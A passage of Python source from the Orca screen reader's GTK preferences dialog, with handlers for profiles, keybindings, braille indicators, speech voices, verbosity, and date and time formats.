        self.startingProfileCombo = self.get_widget('availableProfilesComboBox2')
        self.profilesComboModel = self.get_widget('model9')
        self.__initProfileCombo()
        if self.script.app:
            self.get_widget('profilesFrame').set_sensitive(False)

    def __initProfileCombo(self):
        """Adding available profiles and setting active as the active one"""

        availableProfiles = self.__getAvailableProfiles()
        self.profilesComboModel.clear()

        if not len(availableProfiles):
            self.profilesComboModel.append(self._defaultProfile)
        else:
            for profile in availableProfiles:
                self.profilesComboModel.append(profile)

        activeProfile = self.prefsDict.get('activeProfile') or self._defaultProfile
        startingProfile = self.prefsDict.get('startingProfile') or self._defaultProfile

        activeProfileIter = self.getComboBoxIndex(self.profilesCombo,
                                                  activeProfile[0])
        startingProfileIter = self.getComboBoxIndex(self.startingProfileCombo,
                                                  startingProfile[0])
        self.profilesCombo.set_active(activeProfileIter)
        self.startingProfileCombo.set_active(startingProfileIter)

    def __getAvailableProfiles(self):
        """Get available user profiles."""
        return _settingsManager.availableProfiles()

    def _updateOrcaModifier(self):
        combobox = self.get_widget("orcaModifierComboBox")
        keystring = ", ".join(self.prefsDict["orcaModifierKeys"])
        combobox.set_active(self.getComboBoxIndex(combobox, keystring))

    def populateComboBox(self, combobox, items):
        """Populates the combobox with the items provided.

        Arguments:
        - combobox: the GtkComboBox to populate
        - items: the list of strings with which to populate it
        """

        model = Gtk.ListStore(str)
        for item in items:
            model.append([item])
        combobox.set_model(model)

    def getComboBoxIndex(self, combobox, searchStr, col=0):
        """ For each of the entries in the given combo box, look for searchStr.
            Return the index of the entry if searchStr is found.

        Arguments:
        - combobox: the GtkComboBox to search.
        - searchStr: the string to search for.

        Returns the index of the first entry in combobox with searchStr, or
        0 if not found.
        """

        model = combobox.get_model()
        myiter = model.get_iter_first()
        for i in range(0, len(model)):
            name = model.get_value(myiter, col)
            if name == searchStr:
                return i
            myiter = model.iter_next(myiter)

        return 0

    def getComboBoxList(self, combobox):
        """Get the list of values from the active combox
        """
        active = combobox.get_active()
        model = combobox.get_model()
        activeIter = model.get_iter(active)
        activeLabel = model.get_value(activeIter, 0)
        activeName = model.get_value(activeIter, 1)
        return [activeLabel, activeName]

    def getKeyBindingsModelDict(self, model, modifiedOnly=True):
        modelDict = {}
        node = model.get_iter_first()
        while node:
            child = model.iter_children(node)
            while child:
                key, modified = model.get(child, HANDLER, MODIF)
                if modified or not modifiedOnly:
                    value = []
                    value.append(list(model.get(
                            child, KEY1, MOD_MASK1, MOD_USED1, CLICK_COUNT1)))
                    modelDict[key] = value
                child = model.iter_next(child)
            node = model.iter_next(node)

        return modelDict

    def getModelDict(self, model):
        """Get the list of values from a list[str,str] model
        """
        pronunciation_dict.pronunciation_dict = {}
        currentIter = model.get_iter_first()
        while currentIter is not None:
            key, value = model.get(currentIter, ACTUAL, REPLACEMENT)
            if key and value:
                pronunciation_dict.setPronunciation(key, value)
            currentIter = model.iter_next(currentIter)
        modelDict = pronunciation_dict.pronunciation_dict
        return modelDict

    def showGUI(self):
        """Show the Orca configuration GUI window. This assumes that
        the GUI has already been created.
        """

        orcaSetupWindow = self.get_widget("orcaSetupWindow")

        accelGroup = Gtk.AccelGroup()
        orcaSetupWindow.add_accel_group(accelGroup)
        helpButton = self.get_widget("helpButton")
        (keyVal, modifierMask) = Gtk.accelerator_parse("F1")
        helpButton.add_accelerator("clicked",
                                   accelGroup,
                                   keyVal,
                                   modifierMask,
                                   0)

        try:
            ts = orca_state.lastInputEvent.timestamp
        except:
            ts = 0
        if ts == 0:
            ts = Gtk.get_current_event_time()
        orcaSetupWindow.present_with_time(ts)

        # We always want to re-order the text attributes page so that enabled
        # items are consistently at the top.
        #
        self._setSpokenTextAttributes(
                self.getTextAttributesView,
                _settingsManager.getSetting('enabledSpokenTextAttributes'),
                True, True)

        if self.script.app:
            title = guilabels.PREFERENCES_APPLICATION_TITLE % self.script.app.name
            orcaSetupWindow.set_title(title)

        orcaSetupWindow.show()

    def _initComboBox(self, combobox):
        """Initialize the given combo box to take a list of int/str pairs.

        Arguments:
        - combobox: the GtkComboBox to initialize.
        """

        cell = Gtk.CellRendererText()
        combobox.pack_start(cell, True)
        # We only want to display one column; not two.
        #
        try:
            columnToDisplay = combobox.get_cells()[0]
            combobox.add_attribute(columnToDisplay, 'text', 1)
        except:
            combobox.add_attribute(cell, 'text', 1)
        model = Gtk.ListStore(int, str)
        combobox.set_model(model)

        # Force the display comboboxes to be left aligned.
        #
        if isinstance(combobox, Gtk.ComboBoxText):
            size = combobox.size_request()
            cell.set_fixed_size(size[0] - 29, -1)

        return model

    def _setKeyEchoItems(self):
        """[In]sensitize the checkboxes for the various types of key echo,
        depending upon whether the value of the key echo check button is set.
        """

        enable = self.get_widget("keyEchoCheckButton").get_active()
        self.get_widget("enableAlphabeticKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableNumericKeysCheckButton").set_sensitive(enable)
        self.get_widget("enablePunctuationKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableSpaceCheckButton").set_sensitive(enable)
        self.get_widget("enableModifierKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableFunctionKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableActionKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableNavigationKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableDiacriticalKeysCheckButton").set_sensitive( \
          enable)

    def _presentMessage(self, text, interrupt=False):
        """If the text field is not None, presents the given text, optionally
        interrupting anything currently being spoken.

        Arguments:
        - text: the text to present
        - interrupt: if True, interrupt any speech currently being spoken
        """

        self.script.speakMessage(text, interrupt=interrupt)
        try:
            self.script.displayBrailleMessage(text, flashTime=-1)
        except:
            pass

    def _createNode(self, appName):
        """Create a new root node in the TreeStore model with the name of the
            application.

        Arguments:
        - appName: the name of the TreeStore Node (the same of the application)
        """

        model = self.keyBindingsModel

        myiter = model.append(None)
        model.set_value(myiter, DESCRIP, appName)
        model.set_value(myiter, MODIF, False)

        return myiter

    def _getIterOf(self, appName):
        """Returns the Gtk.TreeIter of the TreeStore model
        that matches the application name passed as argument

        Arguments:
        - appName: a string with the name of the application of the node wanted
                    it's the same that the field DESCRIP of the model treeStore
        """

        model = self.keyBindingsModel

        for row in model:
            if ((model.iter_depth(row.iter) == 0) \
                and (row[DESCRIP] == appName)):
                return row.iter

        return None

    def _clickCountToString(self, clickCount):
        """Given a numeric clickCount, returns a string for inclusion
        in the list of keybindings.

        Argument:
        - clickCount: the number of clicks associated with the keybinding.
        """

        clickCountString = ""
        if clickCount == 2:
            clickCountString = " (%s)" % guilabels.CLICK_COUNT_DOUBLE
        elif clickCount == 3:
            clickCountString = " (%s)" % guilabels.CLICK_COUNT_TRIPLE

        return clickCountString

    def _insertRow(self, handl, kb, parent=None, modif=False):
        """Appends a new row with the new keybinding data to the treeview

        Arguments:
        - handl:  the name of the handler associated to the keyBinding
        - kb:     the new keybinding.
        - parent: the parent node of the treeview, where to append the kb
        - modif:  whether to check the modified field or not.

        Returns a Gtk.TreeIter pointing at the new row.
        """

        model = self.keyBindingsModel

        if parent is None:
            parent = self._getIterOf(guilabels.KB_GROUP_DEFAULT)

        if parent is not None:
            myiter = model.append(parent)
            if not kb.keysymstring:
                text = None
            else:
                clickCount = self._clickCountToString(kb.click_count)
                modifierNames = keybindings.getModifierNames(kb.modifiers)
                keysymstring = kb.keysymstring
                text = keybindings.getModifierNames(kb.modifiers) \
                       + keysymstring \
                       + clickCount

            model.set_value(myiter, HANDLER, handl)
            model.set_value(myiter, DESCRIP, kb.handler.description)
            model.set_value(myiter, MOD_MASK1, str(kb.modifier_mask))
            model.set_value(myiter, MOD_USED1, str(kb.modifiers))
            model.set_value(myiter, KEY1, kb.keysymstring)
            model.set_value(myiter, CLICK_COUNT1, str(kb.click_count))
            if text is not None:
                model.set_value(myiter, OLDTEXT1, text)
                model.set_value(myiter, TEXT1, text)
            model.set_value(myiter, MODIF, modif)
            model.set_value(myiter, EDITABLE, True)

            return myiter
        else:
            return None

    def _insertRowBraille(self, handl, com, inputEvHand, 
                          parent=None, modif=False):
        """Appends a new row with the new braille binding data to the treeview

        Arguments:
        - handl:       the name of the handler associated to the brailleBinding
        - com:         the BrlTTY command
        - inputEvHand: the inputEventHandler with the new brailleBinding
        - parent:      the parent node of the treeview, where to append the kb
        - modif:       whether to check the modified field or not.

        Returns a Gtk.TreeIter pointing at the new row.
        """

        model = self.keyBindingsModel

        if parent is None:
            parent = self._getIterOf(guilabels.KB_GROUP_BRAILLE)

        if parent is not None:
            myiter = model.append(parent)
            model.set_value(myiter, HANDLER, handl)
            model.set_value(myiter, DESCRIP, inputEvHand.description)
            model.set_value(myiter, KEY1, str(com))
            model.set_value(myiter, TEXT1, braille.command_name[com])
            model.set_value(myiter, MODIF, modif)
            model.set_value(myiter, EDITABLE, False)
            return myiter
        else:
            return None

    def _markModified(self):
        """ Mark as modified the user custom key bindings:
        """

        try:
            self.script.setupInputEventHandlers()
            keyBinds = keybindings.KeyBindings()
            keyBinds = _settingsManager.overrideKeyBindings(self.script, keyBinds)
            keyBind = keybindings.KeyBinding(None, None, None, None)
            treeModel = self.keyBindingsModel

            myiter = treeModel.get_iter_first()
            while myiter is not None:
                iterChild = treeModel.iter_children(myiter)
                while iterChild is not None:
                    descrip = treeModel.get_value(iterChild, DESCRIP)
                    keyBind.handler = \
                        input_event.InputEventHandler(None, descrip)
                    if keyBinds.hasKeyBinding(keyBind,
                                              typeOfSearch="description"):
                        treeModel.set_value(iterChild, MODIF, True)
                    iterChild = treeModel.iter_next(iterChild)
                myiter = treeModel.iter_next(myiter)
        except:
            debug.printException(debug.LEVEL_SEVERE)

    def _populateKeyBindings(self, clearModel=True):
        """Fills the TreeView with the list of Orca keybindings

        Arguments:
        - clearModel: if True, initially clear out the key bindings model.
        """

        self.keyBindView.set_model(None)
        self.keyBindView.set_headers_visible(False)
        self.keyBindView.hide()
        if clearModel:
            self.keyBindingsModel.clear()
            self.kbindings = None

        try:
            appName = self.script.app.name
        except:
            appName = ""

        iterApp = self._createNode(appName)
        iterOrca = self._createNode(guilabels.KB_GROUP_DEFAULT)
        iterUnbound = self._createNode(guilabels.KB_GROUP_UNBOUND)

        if not self.kbindings:
            self.kbindings = keybindings.KeyBindings()
            self.script.setupInputEventHandlers()
            allKeyBindings = self.script.getKeyBindings()
            defKeyBindings = self.script.getDefaultKeyBindings()
            for kb in allKeyBindings.keyBindings:
                if not self.kbindings.hasKeyBinding(kb, "strict"):
                    handl = self.script.getInputEventHandlerKey(kb.handler)
                    if not defKeyBindings.hasKeyBinding(kb, "description"):
                        self._insertRow(handl, kb, iterApp)
                    elif kb.keysymstring:
                        self._insertRow(handl, kb, iterOrca)
                    else:
                        self._insertRow(handl, kb, iterUnbound)
                    self.kbindings.add(kb)

        if not self.keyBindingsModel.iter_has_child(iterApp):
            self.keyBindingsModel.remove(iterApp)

        if not self.keyBindingsModel.iter_has_child(iterUnbound):
            self.keyBindingsModel.remove(iterUnbound)

        self._updateOrcaModifier()
        self._markModified()
        iterBB = self._createNode(guilabels.KB_GROUP_BRAILLE)
        self.bbindings = self.script.getBrailleBindings()
        for com, inputEvHand in self.bbindings.items():
            handl = self.script.getInputEventHandlerKey(inputEvHand)
            self._insertRowBraille(handl, com, inputEvHand, iterBB)

        self.keyBindView.set_model(self.keyBindingsModel)
        self.keyBindView.set_headers_visible(True)
        self.keyBindView.expand_all()
        self.keyBindingsModel.set_sort_column_id(OLDTEXT1, Gtk.SortType.ASCENDING)
        self.keyBindView.show()

        # Keep track of new/unbound keybindings that have yet to be applied.
        #
        self.pendingKeyBindings = {}

    def _cleanupSpeechServers(self):
        """Remove unwanted factories and drivers for the current active
        factory, when the user dismisses the Orca Preferences dialog."""

        for workingFactory in self.workingFactories:
            if not (workingFactory == self.speechSystemsChoice):
                workingFactory.SpeechServer.shutdownActiveServers()
            else:
                servers = workingFactory.SpeechServer.getSpeechServers()
                for server in servers:
                    if not (server == self.speechServersChoice):
                        server.shutdown()

    def speechSupportChecked(self, widget):
        """Signal handler for the "toggled" signal for the
           speechSupportCheckButton GtkCheckButton widget. The user has
           [un]checked the 'Enable Speech' checkbox. Set the 'enableSpeech'
           preference to the new value. Set the rest of the speech pane items
           [in]sensensitive depending upon whether this checkbox is checked.

        Arguments:
        - widget: the component that generated the signal.
        """

        enable = widget.get_active()
        self.prefsDict["enableSpeech"] = enable
        self.get_widget("speechOptionsGrid").set_sensitive(enable)

    def onlySpeakDisplayedTextToggled(self, widget):
        """Signal handler for the "toggled" signal for the GtkCheckButton
        onlySpeakDisplayedText. In addition to updating the preferences,
        set the sensitivity of the contextOptionsGrid.

        Arguments:
        - widget: the component that generated the signal.
        """

        enable = widget.get_active()
        self.prefsDict["onlySpeakDisplayedText"] = enable
        self.get_widget("contextOptionsGrid").set_sensitive(not enable)

    def speechSystemsChanged(self, widget):
        """Signal handler for the "changed" signal for the speechSystems
           GtkComboBox widget. The user has selected a different speech
           system. Clear the existing list of speech servers, and setup
           a new list of speech servers based on the new choice. Setup a
           new list of voices for the first speech server in the list.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self.initializingSpeech:
            return

        selectedIndex = widget.get_active()
        self.speechSystemsChoice = self.speechSystemsChoices[selectedIndex]
        self._setupSpeechServers()

    def speechServersChanged(self, widget):
        """Signal handler for the "changed" signal for the speechServers
           GtkComboBox widget. The user has selected a different speech
           server. Clear the existing list of voices, and setup a new
           list of voices based on the new choice.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self.initializingSpeech:
            return

        selectedIndex = widget.get_active()
        self.speechServersChoice = self.speechServersChoices[selectedIndex]

        # Whenever the speech servers change, we need to make sure we
        # clear whatever family was in use by the current voice types.
        # Otherwise, we can end up with family names from one server
        # bleeding over (e.g., "Paul" from Fonix ends up getting in
        # the "Default" voice type after we switch to eSpeak).
        #
        try:
            del self.defaultVoice[acss.ACSS.FAMILY]
            del self.uppercaseVoice[acss.ACSS.FAMILY]
            del self.hyperlinkVoice[acss.ACSS.FAMILY]
            del self.systemVoice[acss.ACSS.FAMILY]
        except:
            pass

        self._setupVoices()

    def speechLanguagesChanged(self, widget):
        """Signal handler for the "value_changed" signal for the languages
           GtkComboBox widget. The user has selected a different voice
           language. Save the new voice language name based on the new choice.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self.initializingSpeech:
            return

        selectedIndex = widget.get_active()
        try:
            self.speechLanguagesChoice = self.speechLanguagesChoices[selectedIndex]
            if (self.speechServersChoice, self.speechLanguagesChoice) in \
                    self.selectedFamilyChoices:
                i = self.selectedFamilyChoices[self.speechServersChoice, \
                        self.speechLanguagesChoice]
                family = self.speechFamiliesChoices[i]
                name = family[speechserver.VoiceFamily.NAME]
                language = family[speechserver.VoiceFamily.LANG]
                dialect = family[speechserver.VoiceFamily.DIALECT]
                variant = family[speechserver.VoiceFamily.VARIANT]
                voiceType = self.get_widget("voiceTypesCombo").get_active()
                self._setFamilyNameForVoiceType(voiceType, name, language, dialect, variant)
        except:
            debug.printException(debug.LEVEL_SEVERE)

        # Remember the last family manually selected by the user for the
        # current speech server.
        #
        if not selectedIndex == -1:
            self.selectedLanguageChoices[self.speechServersChoice] = selectedIndex

        self._setupFamilies()

    def speechFamiliesChanged(self, widget):
        """Signal handler for the "value_changed" signal for the families
           GtkComboBox widget. The user has selected a different voice
           family. Save the new voice family name based on the new choice.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self.initializingSpeech:
            return

        selectedIndex = widget.get_active()
        try:
            family = self.speechFamiliesChoices[selectedIndex]
            name = family[speechserver.VoiceFamily.NAME]
            language = family[speechserver.VoiceFamily.LANG]
            dialect = family[speechserver.VoiceFamily.DIALECT]
            variant = family[speechserver.VoiceFamily.VARIANT]
            voiceType = self.get_widget("voiceTypesCombo").get_active()
            self._setFamilyNameForVoiceType(voiceType, name, language, dialect, variant)
        except:
            debug.printException(debug.LEVEL_SEVERE)

        # Remember the last family manually selected by the user for the
        # current speech server.
        #
        if not selectedIndex == -1:
            self.selectedFamilyChoices[self.speechServersChoice, \
                    self.speechLanguagesChoice] = selectedIndex

    def voiceTypesChanged(self, widget):
        """Signal handler for the "changed" signal for the voiceTypes
           GtkComboBox widget. The user has selected a different voice
           type. Setup the new family, rate, pitch and volume component
           values based on the new choice.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self.initializingSpeech:
            return

        voiceType = widget.get_active()
        self._setVoiceSettingsForVoiceType(voiceType)

    def rateValueChanged(self, widget):
        """Signal handler for the "value_changed" signal for the rateScale
           GtkScale widget. The user has changed the current rate value.
           Save the new rate value based on the currently selected voice
           type.

        Arguments:
        - widget: the component that generated the signal.
        """

        rate = widget.get_value()
        voiceType = self.get_widget("voiceTypesCombo").get_active()
        self._setRateForVoiceType(voiceType, rate)
        voices = _settingsManager.getSetting('voices')
        voices[settings.DEFAULT_VOICE][acss.ACSS.RATE] = rate
        _settingsManager.setSetting('voices', voices)

    def pitchValueChanged(self, widget):
        """Signal handler for the "value_changed" signal for the pitchScale
           GtkScale widget. The user has changed the current pitch value.
           Save the new pitch value based on the currently selected voice
           type.

        Arguments:
        - widget: the component that generated the signal.
        """

        pitch = widget.get_value()
        voiceType = self.get_widget("voiceTypesCombo").get_active()
        self._setPitchForVoiceType(voiceType, pitch)
        voices = _settingsManager.getSetting('voices')
        voices[settings.DEFAULT_VOICE][acss.ACSS.AVERAGE_PITCH] = pitch
        _settingsManager.setSetting('voices', voices)

    def volumeValueChanged(self, widget):
        """Signal handler for the "value_changed" signal for the voiceScale
           GtkScale widget. The user has changed the current volume value.
           Save the new volume value based on the currently selected voice
           type.

        Arguments:
        - widget: the component that generated the signal.
        """

        volume = widget.get_value()
        voiceType = self.get_widget("voiceTypesCombo").get_active()
        self._setVolumeForVoiceType(voiceType, volume)
        voices = _settingsManager.getSetting('voices')
        voices[settings.DEFAULT_VOICE][acss.ACSS.GAIN] = volume
        _settingsManager.setSetting('voices', voices)

    def checkButtonToggled(self, widget):
        """Signal handler for "toggled" signal for basic GtkCheckButton 
           widgets. The user has altered the state of the checkbox.
           Set the preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        # To use this default handler please make sure:
        # The name of the setting that will be changed is: settingName
        # The id of the widget in the ui should be: settingNameCheckButton
        #
        settingName = Gtk.Buildable.get_name(widget)
        # strip "CheckButton" from the end.
        settingName = settingName[:-11] 
        self.prefsDict[settingName] = widget.get_active()

    def keyEchoChecked(self, widget):
        """Signal handler for the "toggled" signal for the
           keyEchoCheckbutton GtkCheckButton widget. The user has
           [un]checked the 'Enable Key Echo' checkbox. Set the
           'enableKeyEcho' preference to the new value. [In]sensitize
           the checkboxes for the various types of key echo, depending
           upon whether this value is checked or unchecked.

        Arguments:
        - widget: the component that generated the signal.
        """

        self.prefsDict["enableKeyEcho"] = widget.get_active()
        self._setKeyEchoItems()

    def brailleSelectionChanged(self, widget):
        """Signal handler for the "toggled" signal for the
           brailleSelectionNoneButton, brailleSelection7Button,
           brailleSelection8Button or brailleSelectionBothButton
           GtkRadioButton widgets. The user has toggled the braille
           selection indicator value. If this signal was generated
           as the result of a radio button getting selected (as
           opposed to a radio button losing the selection), set the
           'brailleSelectorIndicator' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.BRAILLE_DOT_7:
                self.prefsDict["brailleSelectorIndicator"] = \
                    settings.BRAILLE_UNDERLINE_7
            elif widget.get_label() == guilabels.BRAILLE_DOT_8:
                self.prefsDict["brailleSelectorIndicator"] = \
                    settings.BRAILLE_UNDERLINE_8
            elif widget.get_label() == guilabels.BRAILLE_DOT_7_8:
                self.prefsDict["brailleSelectorIndicator"] = \
                    settings.BRAILLE_UNDERLINE_BOTH
            else:
                self.prefsDict["brailleSelectorIndicator"] = \
                    settings.BRAILLE_UNDERLINE_NONE

    def brailleLinkChanged(self, widget):
        """Signal handler for the "toggled" signal for the
           brailleLinkNoneButton, brailleLink7Button,
           brailleLink8Button or brailleLinkBothButton
           GtkRadioButton widgets. The user has toggled the braille
           link indicator value. If this signal was generated
           as the result of a radio button getting selected (as
           opposed to a radio button losing the selection), set the
           'brailleLinkIndicator' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.BRAILLE_DOT_7:
                self.prefsDict["brailleLinkIndicator"] = \
                    settings.BRAILLE_UNDERLINE_7
            elif widget.get_label() == guilabels.BRAILLE_DOT_8:
                self.prefsDict["brailleLinkIndicator"] = \
                    settings.BRAILLE_UNDERLINE_8
            elif widget.get_label() == guilabels.BRAILLE_DOT_7_8:
                self.prefsDict["brailleLinkIndicator"] = \
                    settings.BRAILLE_UNDERLINE_BOTH
            else:
                self.prefsDict["brailleLinkIndicator"] = \
                    settings.BRAILLE_UNDERLINE_NONE

    def brailleIndicatorChanged(self, widget):
        """Signal handler for the "toggled" signal for the
           textBrailleNoneButton, textBraille7Button, textBraille8Button
           or textBrailleBothButton GtkRadioButton widgets. The user has
           toggled the text attributes braille indicator value. If this signal
           was generated as the result of a radio button getting selected
           (as opposed to a radio button losing the selection), set the
           'textAttributesBrailleIndicator' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.BRAILLE_DOT_7:
                self.prefsDict["textAttributesBrailleIndicator"] = \
                    settings.BRAILLE_UNDERLINE_7
            elif widget.get_label() == guilabels.BRAILLE_DOT_8:
                self.prefsDict["textAttributesBrailleIndicator"] = \
                    settings.BRAILLE_UNDERLINE_8
            elif widget.get_label() == guilabels.BRAILLE_DOT_7_8:
                self.prefsDict["textAttributesBrailleIndicator"] = \
                    settings.BRAILLE_UNDERLINE_BOTH
            else:
                self.prefsDict["textAttributesBrailleIndicator"] = \
                    settings.BRAILLE_UNDERLINE_NONE

    def punctuationLevelChanged(self, widget):
        """Signal handler for the "toggled" signal for the noneButton,
           someButton or allButton GtkRadioButton widgets. The user has
           toggled the speech punctuation level value. If this signal
           was generated as the result of a radio button getting selected
           (as opposed to a radio button losing the selection), set the
           'verbalizePunctuationStyle' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.PUNCTUATION_STYLE_NONE:
                self.prefsDict["verbalizePunctuationStyle"] = \
                    settings.PUNCTUATION_STYLE_NONE
            elif widget.get_label() == guilabels.PUNCTUATION_STYLE_SOME:
                self.prefsDict["verbalizePunctuationStyle"] = \
                    settings.PUNCTUATION_STYLE_SOME
            elif widget.get_label() == guilabels.PUNCTUATION_STYLE_MOST:
                self.prefsDict["verbalizePunctuationStyle"] = \
                    settings.PUNCTUATION_STYLE_MOST
            else:
                self.prefsDict["verbalizePunctuationStyle"] = \
                    settings.PUNCTUATION_STYLE_ALL

    def orcaModifierChanged(self, widget):
        """Signal handler for the changed signal for the orcaModifierComboBox
           Set the 'orcaModifierKeys' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        model = widget.get_model()
        myIter = widget.get_active_iter()
        orcaModifier = model[myIter][0]
        self.prefsDict["orcaModifierKeys"] = orcaModifier.split(', ')

    def progressBarVerbosityChanged(self, widget):
        """Signal handler for the changed signal for the progressBarVerbosity
           GtkComboBox widget. Set the 'progressBarVerbosity' preference to
           the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        model = widget.get_model()
        myIter = widget.get_active_iter()
        progressBarVerbosity = model[myIter][0]
        if progressBarVerbosity == guilabels.PROGRESS_BAR_ALL:
            self.prefsDict["progressBarVerbosity"] = \
                settings.PROGRESS_BAR_ALL
        elif progressBarVerbosity == guilabels.PROGRESS_BAR_WINDOW:
            self.prefsDict["progressBarVerbosity"] = \
                settings.PROGRESS_BAR_WINDOW
        else:
            self.prefsDict["progressBarVerbosity"] = \
                settings.PROGRESS_BAR_APPLICATION

    def capitalizationStyleChanged(self, widget):
        model = widget.get_model()
        myIter = widget.get_active_iter()
        capitalizationStyle = model[myIter][0]
        if capitalizationStyle == guilabels.CAPITALIZATION_STYLE_ICON:
            self.prefsDict["capitalizationStyle"] = settings.CAPITALIZATION_STYLE_ICON
        elif capitalizationStyle == guilabels.CAPITALIZATION_STYLE_SPELL:
            self.prefsDict["capitalizationStyle"] = settings.CAPITALIZATION_STYLE_SPELL
        else:
            self.prefsDict["capitalizationStyle"] = settings.CAPITALIZATION_STYLE_NONE
        speech.updateCapitalizationStyle()

    def sayAllStyleChanged(self, widget):
        """Signal handler for the "changed" signal for the sayAllStyle
           GtkComboBox widget. Set the 'sayAllStyle' preference to the
           new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        model = widget.get_model()
        myIter = widget.get_active_iter()
        sayAllStyle = model[myIter][0]
        if sayAllStyle == guilabels.SAY_ALL_STYLE_LINE:
            self.prefsDict["sayAllStyle"] = settings.SAYALL_STYLE_LINE
        elif sayAllStyle == guilabels.SAY_ALL_STYLE_SENTENCE:
            self.prefsDict["sayAllStyle"] = settings.SAYALL_STYLE_SENTENCE

    def dateFormatChanged(self, widget):
        """Signal handler for the "changed" signal for the dateFormat
           GtkComboBox widget. Set the 'dateFormat' preference to the
           new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        dateFormatCombo = widget.get_active()
        if dateFormatCombo == DATE_FORMAT_LOCALE:
            newFormat = messages.DATE_FORMAT_LOCALE
        elif dateFormatCombo == DATE_FORMAT_NUMBERS_DM:
            newFormat = messages.DATE_FORMAT_NUMBERS_DM
        elif dateFormatCombo == DATE_FORMAT_NUMBERS_MD:
            newFormat = messages.DATE_FORMAT_NUMBERS_MD
        elif dateFormatCombo == DATE_FORMAT_NUMBERS_DMY:
            newFormat = messages.DATE_FORMAT_NUMBERS_DMY
        elif dateFormatCombo == DATE_FORMAT_NUMBERS_MDY:
            newFormat = messages.DATE_FORMAT_NUMBERS_MDY
        elif dateFormatCombo == DATE_FORMAT_NUMBERS_YMD:
            newFormat = messages.DATE_FORMAT_NUMBERS_YMD
        elif dateFormatCombo == DATE_FORMAT_FULL_DM:
            newFormat = messages.DATE_FORMAT_FULL_DM
        elif dateFormatCombo == DATE_FORMAT_FULL_MD:
            newFormat = messages.DATE_FORMAT_FULL_MD
        elif dateFormatCombo == DATE_FORMAT_FULL_DMY:
            newFormat = messages.DATE_FORMAT_FULL_DMY
        elif dateFormatCombo == DATE_FORMAT_FULL_MDY:
            newFormat = messages.DATE_FORMAT_FULL_MDY
        elif dateFormatCombo == DATE_FORMAT_FULL_YMD:
            newFormat = messages.DATE_FORMAT_FULL_YMD
        elif dateFormatCombo == DATE_FORMAT_ABBREVIATED_DM:
            newFormat = messages.DATE_FORMAT_ABBREVIATED_DM
        elif dateFormatCombo == DATE_FORMAT_ABBREVIATED_MD:
            newFormat = messages.DATE_FORMAT_ABBREVIATED_MD
        elif dateFormatCombo == DATE_FORMAT_ABBREVIATED_DMY:
            newFormat = messages.DATE_FORMAT_ABBREVIATED_DMY
        elif dateFormatCombo == DATE_FORMAT_ABBREVIATED_MDY:
            newFormat = messages.DATE_FORMAT_ABBREVIATED_MDY
        elif dateFormatCombo == DATE_FORMAT_ABBREVIATED_YMD:
            newFormat = messages.DATE_FORMAT_ABBREVIATED_YMD
        self.prefsDict["presentDateFormat"] = newFormat
    
    def timeFormatChanged(self, widget):
        """Signal handler for the "changed" signal for the timeFormat
           GtkComboBox widget. Set the 'timeFormat' preference to the
           new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        timeFormatCombo = widget.get_active()
        if timeFormatCombo == TIME_FORMAT_LOCALE:
            newFormat = messages.TIME_FORMAT_LOCALE
        elif timeFormatCombo == TIME_FORMAT_12_HM:
            newFormat = messages.TIME_FORMAT_12_HM
        elif timeFormatCombo == TIME_FORMAT_12_HMS:
            newFormat = messages.TIME_FORMAT_12_HMS
        elif timeFormatCombo == TIME_FORMAT_24_HMS:
            newFormat = messages.TIME_FORMAT_24_HMS
        elif timeFormatCombo == TIME_FORMAT_24_HMS_WITH_WORDS:
            newFormat = messages.TIME_FORMAT_24_HMS_WITH_WORDS
        elif timeFormatCombo == TIME_FORMAT_24_HM:
            newFormat = messages.TIME_FORMAT_24_HM
        elif timeFormatCombo == TIME_FORMAT_24_HM_WITH_WORDS:
            newFormat  = messages.TIME_FORMAT_24_HM_WITH_WORDS
        self.prefsDict["presentTimeFormat"] =  newFormat

    def speechVerbosityChanged(self, widget):
        """Signal handler for the "toggled" signal for the speechBriefButton,
           or speechVerboseButton GtkRadioButton widgets. The user has
           toggled the speech verbosity level value. If this signal was
           generated as the result of a radio button getting selected
           (as opposed to a radio button losing the selection), set the
           'speechVerbosityLevel' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.VERBOSITY_LEVEL_BRIEF:
                self.prefsDict["speechVerbosityLevel"] = \
                    settings.VERBOSITY_LEVEL_BRIEF
            else:
                self.prefsDict["speechVerbosityLevel"] = \
                    settings.VERBOSITY_LEVEL_VERBOSE

    def progressBarUpdateIntervalValueChanged(self, widget):
        """Signal handler for the "value_changed" signal for the
           progressBarUpdateIntervalSpinButton GtkSpinButton widget.

        Arguments:
        - widget: the component that generated the signal.
        """

        self.prefsDict["progressBarUpdateInterval"] = widget.get_value_as_int()

    def brailleFlashTimeValueChanged(self, widget):
        self.prefsDict["brailleFlashTime"] = widget.get_value_as_int() * 1000

    def abbrevRolenamesChecked(self, widget):
        """Signal handler for the "toggled" signal for the abbrevRolenames
           GtkCheckButton widget. The user has [un]checked the 'Abbreviated
           Rolenames' checkbox. Set the 'brailleRolenameStyle' preference
           to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            self.prefsDict["brailleRolenameStyle"] = \
                settings.BRAILLE_ROLENAME_STYLE_SHORT
